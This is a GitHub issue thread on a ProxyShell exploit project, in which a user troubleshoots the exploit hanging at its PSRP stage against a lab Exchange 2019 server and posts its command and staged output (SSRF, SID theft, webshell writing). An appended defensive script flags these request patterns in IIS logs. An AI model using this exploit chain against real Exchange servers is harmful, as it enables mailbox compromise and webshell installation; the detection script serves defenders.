ProxyShell

Exploit hangs at "[Stage 4] Dealing with PSRP".

Open jsdhasfeds opened this issue 3 years ago • 4 comments

Hi,

Thank you for your effort!

When I try this against Exchange 2019 CU 8 (which is vulnerable), the exploit seems to work up to the point "[Stage 4] Dealing with PSRP" where it hangs.

Is there anything I can do to fix this?

Thanks!

jsdhasfeds avatar Aug 20 '21 15:08 jsdhasfeds

Interesting, you can try this method to get further info

  1. Create a file named log.json:

```json
{
    "version": 1,
    "disable_existing_loggers": false,
    "formatters": {
        "simple": {
            "format": "%(asctime)s - %(name)s - %(levelname)s - %(message)s"
        }
    },

    "handlers": {
        "console": {
            "class": "logging.StreamHandler",
            "level": "DEBUG",
            "formatter": "simple",
            "stream": "ext://sys.stdout"
        }
    },

    "loggers": {
        "pypsrp": {
            "level": "DEBUG",
            "handlers": ["console"],
            "propagate": false
        }
    }
}
```

  2. Run exploit with this command: `PYPSRP_LOG_CFG=log.json python3 exploit.py ...`

It should give you tons of PSRP output, and you could leave the entire output here.

ktecv2000 avatar Aug 21 '21 07:08 ktecv2000

Sure. Here you go.

I noticed the text "...CmdletAccessDeniedException] The user "adlab.local/Users/Administrator" isn't assigned to any management roles." at the very end. Is that the problem? If so, why does the account differ from the one whose e-mail I am trying to abuse (domainadmin1)? Which management roles are required for this to work?

```
└─# PYPSRP_LOG_CFG=log.json python3 exploit.py 10.0.0.202 [email protected] 130 ⨯
[Stage 1] Performing SSRF attack against Autodiscover
[Stage 2] Performing malformed SSRF attack to obtain Security ID (SID) using endpoint /mapi/emsmdb against 10.0.0.202
[Stage 2] User SID not an administrator, fixing user SID
[Stage 2] Successfully obtained SID: S-1-5-21-1102219418-2391489858-980994391-500
[Stage 3] Accessing /Powershell Endpoint ...
[Stage 3] Authentication Successfully
Successfully sent email
litte sleep to wait for mail sending
[Stage 4] Writing Webshell ...
[Stage 4] Dealing with WSMV
[Stage 4] Dealing with PSRP
```

jsdhasfeds avatar Aug 21 '21 08:08 jsdhasfeds

So weird, would you like to create another user account for it and try again?

ktecv2000 avatar Aug 21 '21 16:08 ktecv2000

I added a mailbox for the domain account adlab.local\domainuser1 and ran the same command again. It seems the same issue occurs.

```
└─# PYPSRP_LOG_CFG=log.json python3 exploit.py 10.0.0.202 [email protected]
[Stage 1] Performing SSRF attack against Autodiscover
[Stage 2] Performing malformed SSRF attack to obtain Security ID (SID) using endpoint /mapi/emsmdb against 10.0.0.202
[Stage 2] User SID not an administrator, fixing user SID
[Stage 2] Successfully obtained SID: S-1-5-21-1102219418-2391489858-980994391-500
[Stage 3] Accessing /Powershell Endpoint ...
[Stage 3] Authentication Successfully
Successfully sent email
litte sleep to wait for mail sending
[Stage 4] Writing Webshell ...
[Stage 4] Dealing with WSMV
[Stage 4] Dealing with PSRP
```

jsdhasfeds avatar Aug 21 '21 19:08 jsdhasfeds
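
For defenders reading this thread: the stages named in the tool output (Autodiscover, /mapi/emsmdb, /Powershell) all travel through the Autodiscover front end, and that is visible in the Exchange server's IIS logs whether or not the attempt gets past the management-role check. The triage script below is an added example, not part of the thread or of the project's code; the log lines, hosts, addresses and token value are constructed, and the function names are hypothetical.

```python
"""Flag requests in an IIS W3C log that reach Exchange back ends via autodiscover.json."""
from urllib.parse import unquote

# Constructed sample log (W3C extended format). Nothing here is captured traffic.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
2021-08-21 10:05:58 10.0.0.202 GET /autodiscover/autodiscover.json @example.test/mapi/emsmdb/?&Email=autodiscover/autodiscover.json%3F@example.test 443 - 192.0.2.10 python-requests/2.25.1 200
2021-08-21 10:06:03 10.0.0.202 POST /autodiscover/autodiscover.json @example.test/Powershell?X-Rps-CAT=QUJD&Email=autodiscover/autodiscover.json%3F@example.test 443 - 192.0.2.10 python-requests/2.25.1 200
2021-08-21 10:07:10 10.0.0.202 POST /autodiscover/autodiscover.xml - 443 - 10.0.0.50 Microsoft+Office/16.0 401
2021-08-21 10:07:12 10.0.0.202 POST /powershell/ serializationLevel=Full 443 exadmin@example.test 10.0.0.50 Microsoft+WinRM+Client 200
2021-08-21 10:07:15 10.0.0.202 GET /autodiscover/autodiscover.json/v1.0/user@example.test Protocol=ActiveSync 443 - 10.0.0.51 Outlook-iOS/2.0 200
"""

# Substrings of the decoded query that have no business behind autodiscover.json.
BACKEND_MARKERS = {
    "/powershell": "query routes to the /Powershell back end",
    "/mapi/emsmdb": "query routes to /mapi/emsmdb",
    "x-rps-cat=": "carries an X-Rps-CAT token",
}


def parse_w3c(text):
    """Yield one dict per record, keyed by the most recent #Fields header."""
    fields = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            values = line.split()
            if len(values) == len(fields):  # skip truncated or malformed records
                yield dict(zip(fields, values))


def classify(record):
    """Return the reasons a record looks suspicious (empty list if it does not)."""
    stem = record.get("cs-uri-stem", "").lower()
    # Decode once and lowercase so %2F-style encoding or case changes do not hide a marker.
    query = unquote(record.get("cs-uri-query", "")).lower()
    if "autodiscover.json" not in stem:
        return []  # direct /powershell/ or autodiscover.xml traffic is out of scope here
    reasons = [why for marker, why in BACKEND_MARKERS.items() if marker in query]
    if reasons and "email=autodiscover/autodiscover.json" in query:
        reasons.append("Email parameter points back at autodiscover.json")
    return reasons


def find_suspicious(text):
    """Return one finding per suspicious record, in log order."""
    findings = []
    for rec in parse_w3c(text):
        reasons = classify(rec)
        if reasons:
            findings.append({
                "time": f"{rec.get('date', '?')} {rec.get('time', '?')}",
                "client": rec.get("c-ip", "?"),
                "method": rec.get("cs-method", "?"),
                "stem": rec.get("cs-uri-stem", "?"),
                "status": rec.get("sc-status", "?"),
                "reasons": reasons,
            })
    return findings


if __name__ == "__main__":
    for f in find_suspicious(SAMPLE_LOG):
        print(f"{f['time']} {f['client']} {f['method']} {f['stem']} "
              f"status={f['status']}: {'; '.join(f['reasons'])}")
```

An HTTP 200 on a flagged line only shows that the front end proxied the request; it does not show that a command ran, so treat every hit as a reason to check the server's patch level and look for follow-on activity.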